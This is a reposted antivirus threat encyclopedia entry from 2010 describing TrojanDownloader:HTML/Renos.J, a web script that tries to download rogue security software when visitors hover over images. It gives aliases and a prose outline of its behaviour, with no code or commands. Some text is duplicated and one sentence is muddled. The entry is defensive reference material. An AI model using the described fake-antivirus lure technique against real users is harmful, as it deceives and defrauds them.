Home / malwarePDF  

TrojanDownloader:HTML/Renos.J


First posted on 06 October 2010.
Source: SecurityHome

Aliases :

TrojanDownloader:HTML/Renos.J is also known as FakeAlert (AVG), HTML/Revir.Gen (Avira), Trojan-Downloader.HTML.Renos (Ikarus), Downloader.MisleadApp (Symantec), Mal_FakeAVB (Trend Micro).

Explanation :

TrojanDownloader:HTML/Renos.J is a detection for a trojan HTML script that attempts to download executable rogue security software when a user visits a malicious Web site and moves the mouse cursor over certain graphics or images. Note: Reports of Rogue Antivirus programs have been more prevalent as of late. These are programs that generate misleading alerts and false detections in order to convince users to purchase illegitimate security software. Some of these programs, such as Trojan:Win32/Antivirusxp and Program:Win32/FakeRednefed may display product names or logos in an apparently unlawful attempt to impersonate Microsoft products.
Top

TrojanDownloader:HTML/Renos.J is a detection for a trojan HTML script that attempts to download executable rogue security software when a user visits a malicious Web site and moves the mouse cursor over certain graphics or images. InstallationTrojanDownloader:HTML/Renos.J does not install locally, however, it may be cached in the temporary Internet files folder when viewing a malicious Web page. The page may display a pop-up message, which is usually difficult to cancel or to close. Payload Downloads Rogue Security ProgramViewing a malicious Web page containing this trojan script moves the mouse cursor over certain graphics or images. The trojan script could also invoke a dialogue box requesting the user to save or run a rogue security program. The malicious script will redirect user to different page to start the infection process by downloading and executing the Renos rogue software.

Analysis by Rex Plantado

Last update 06 October 2010

 

TOP